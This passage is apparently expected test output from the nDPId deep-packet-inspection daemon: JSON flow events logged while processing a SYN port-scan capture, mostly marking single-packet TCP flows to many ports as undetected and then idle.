-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
